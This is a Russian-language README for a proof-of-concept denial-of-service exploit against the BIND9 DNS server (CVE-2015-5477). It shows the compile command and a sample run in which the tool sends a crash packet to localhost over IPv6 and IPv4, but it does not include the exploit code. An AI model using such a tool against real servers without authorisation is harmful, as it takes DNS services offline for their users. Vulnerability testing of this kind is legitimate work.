
PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure
Этот эксплоит проверяет, уязвим ли сервер BIND9, отправляя эксплоит, чтобы увидеть, произойдет ли сбой.
Это код на C, который вы компилируете обычным способом в Unix/Windows, например:
# gcc tkill.c -o tkill
Он будет работать как через IPv4, так и через IPv6.
Вот как это выглядит при запуске против localhost. Поскольку он получает два IP-адреса при разрешении имени, он попробует оба. Сначала он запрашивает строку "version", затем отправляет эксплоит. Когда он проверяет второй адрес, запрос версии не удается, потому что служба уже аварийно завершилась от первой попытки.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Разрешение IP-адреса
[+] localhost: Разрешено несколько IP-адресов (ПРИМЕЧАНИЕ)
[+] ::1: Проверка...
[+] Запрос версии...
[+] ::1: "9.11.0pre-alpha"
[+] Отправка DoS-пакета...
[+] Ожидание 5 секунд ответа...
[+] тайм-аут, вероятно, аварийное завершение
[+] 127.0.0.1: Проверка...
[+] Запрос версии...
[-] тайм-аут при получении версии, повторная попытка
[-] тайм-аут при получении версии, повторная попытка
[-] тайм-аут при получении версии, повторная попытка
[-] Не удается запросить сервер, он уже аварийно завершился?
[-] Отправка эксплоита в любом случае.
[+] Отправка DoS-пакета...
[+] Ожидание 5 секунд ответа...
[+] тайм-аут, вероятно, аварийное завершение